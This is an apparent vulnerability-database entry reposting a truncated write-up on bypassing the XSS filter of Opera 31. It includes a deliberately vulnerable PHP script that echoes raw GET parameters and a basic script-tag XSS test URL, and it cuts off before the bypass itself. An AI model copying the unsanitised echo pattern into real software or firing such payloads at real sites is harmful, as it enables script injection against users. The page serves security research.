Opera 31.0.1889.174 XSS Filter Bypass

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

<pre class=""> # Full Explanation # Opera browser is a famous browser in internet and for this reason the opera company should secure the browser to users. one of this security issues is the Anti-XSS. The Anti-XSS stops executing javascript and today i'm going ro bypass it. # Fist, make a vulnerable PHP file (EX: opera.php): &lt;?php // Echo the value of parameter one echo "This is text1:".$_GET['text1']."&lt;br&gt;&lt;br&gt;"; // Echo the value of parameter two echo "This is text2:".$_GET['text2']."&lt;br&gt;&lt;br&gt;"; ?&gt; # Next, i want to test a simple XSS payload like this: http://[HOSTNAME]/[PATH]/opera.php?text1=&lt;script&gt;alert(/XSS/)&lt;/script&gt;&amp;text2=ashiayne # that JS code will be shown in the source but you will get no alert and if you see the source you find that your code was shown with red highlight.that's for high security of opera. if you try to test other payloads you will see the same result. # OK, let's try using script tag (&lt;scrip&gt;) without...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息